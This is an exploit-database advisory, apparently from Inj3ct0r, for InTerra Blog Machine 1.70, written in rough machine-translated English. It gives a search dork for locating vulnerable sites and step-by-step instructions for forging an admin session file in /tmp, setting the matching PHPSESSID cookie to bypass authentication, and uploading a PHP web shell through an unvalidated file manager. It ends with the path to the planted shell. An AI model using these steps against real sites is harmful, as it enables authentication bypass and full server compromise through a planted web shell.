======================================================= InTerra Blog Machine <= 1.70 Shell Upload Vulnerability ======================================================= 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 0 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1 #[+] Discovered By : Inj3ct0r #[+] Site : Inj3ct0r.com #[+] support e-mail : submit[at]inj3ct0r.com Product: InTerra Blog Machine Version: 1.70 Site: Dull.ru Dork : "Powered by InTerra Blog Machine" Authorization. The substitution sesii. PHP code: //check access if(!$_SESSION['admin']){ header("Location: " . SERVER_ROOT); exit; } go to / tmp create sesiyu, 0777 law: sess_aaec41a3b692b6be0dc292e40b778595 Code: admin|b:1; And Cook hammer in your browser. PHPSESSID=aaec41a3b692b6be0dc292e40b778595 After authentication : http://127.0.0.1/interra/filemanager/ And pour shell. Checks not (: lib \ uploader.class.php PHP code: function copyFile($name,$destination){ if(!$result = move_uploaded_file($name,$destination)){ $result = copy($name,$destination); } return $result; } http://127.0.0.1/interra/files/shell.php # ~ - [ [ : Inj3ct0r : ] ]